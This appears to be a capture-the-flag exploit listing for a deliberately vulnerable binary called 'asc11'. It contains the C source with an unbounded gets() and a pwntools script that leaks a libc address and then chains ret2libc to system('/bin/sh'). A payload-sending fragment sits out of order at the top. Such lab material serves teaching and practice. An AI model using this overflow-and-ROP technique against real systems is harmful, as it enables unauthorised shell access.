Asc 11 π
# Deliver one stage: 'offset' bytes of filler up to the saved return address,
# then the serialized ROP chain (rop is a pwntools ROP object built earlier).
payload = b'A'*offset + rop.chain()
# NOTE(review): the target prints its prompt with puts("Input: "), which ends
# the line with '\n'. sendlineafter() only consumes through b'Input: ', so that
# newline stays unread and will be returned by the next recvline() -- anything
# that parses a leak right after this send has to account for it.
p.sendlineafter(b'Input: ', payload)
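/*
 * asc11 challenge binary.
 *
 * Reads a line into a 32-byte stack buffer with gets(), which never bounds
 * the read: anything longer than 32 bytes overwrites the saved rbp and then
 * the return address (hence the exploit's 40-byte offset: 32 for buf plus
 * 8 for the saved rbp). gets() is kept on purpose -- it IS the vulnerability
 * this listing demonstrates; do not "fix" it without also updating the
 * exploit. Restored the braces and the standard int return type lost in the
 * original listing.
 */
int main(void)
{
    char buf[32];

    /* Unbuffered stdout (the original passed the raw glibc value 2 for
     * _IONBF) so the prompt reaches a pipe/socket before gets() blocks. */
    setvbuf(stdout, NULL, _IONBF, 0);
    puts("Input: ");   /* puts() appends '\n' -- the prompt is "Input: \n" */
    gets(buf);         /* <-- vulnerable: unbounded read into buf[32] */
    return 0;
}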
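# --- Stage 1: ret2plt, leak the runtime address of puts ---------------------
# elf and libc are assumed to be pwntools ELF objects created earlier (not
# shown here); ROP(elf) also needs context.binary to be set -- verify above.
p = process('./asc11')

# Distance from the start of buf to the saved return address: the 32-byte
# buffer plus the 8-byte saved rbp. Presumes the binary was built without a
# stack canary (the overflow would abort in __stack_chk_fail otherwise).
offset = 40

# Chain: puts(puts@got) prints the resolved libc address of puts, then
# re-enter main so a second payload can be delivered.
rop = ROP(elf)
rop.puts(elf.got['puts'])
rop.call(elf.symbols['main'])
payload = b'A' * offset + rop.chain()

# The prompt is printed with puts(), so it ends in '\n'. Synchronise on the
# whole line: waiting only for b'Input: ' leaves that newline unread, and the
# first read after the send would then return an empty line, not the leak.
p.sendlineafter(b'Input: \n', payload)

# puts() stops at the first NUL. A canonical x86-64 user-space address has
# its two high bytes zero, so exactly 6 bytes arrive before puts' own '\n'.
# Read them by count and never strip() them: an address whose low byte is
# 0x0a or 0x20 would be eaten by whitespace stripping and the leak corrupted.
leak = u64(p.recvn(6).ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
# The original f-string had no braces and printed the text "hex(libc.address)".
log.success(f'Libc base: {hex(libc.address)}')
# Sanity check before using the base: a mmap'd libc is always page aligned.
assert libc.address & 0xfff == 0, 'bad leak: libc base is not page aligned'

# --- Stage 2: ret2libc system("/bin/sh") ------------------------------------
rop2 = ROP(libc)
# Stack alignment: with the usual frame (buf at rbp-32), the pop-rdi gadget
# leaves rsp 8 bytes off the 16-byte alignment the SysV ABI requires at a
# function entry, and glibc's system() faults on an SSE movaps when
# misaligned. A lone 'ret' gadget shifts rsp by 8 to fix that. If the chain
# crashes only with this line present, the frame is laid out differently
# and the gadget should be removed.
rop2.raw(rop2.find_gadget(['ret']).address)
rop2.system(next(libc.search(b'/bin/sh')))
payload = b'A' * offset + rop2.chain()
p.sendlineafter(b'Input: \n', payload)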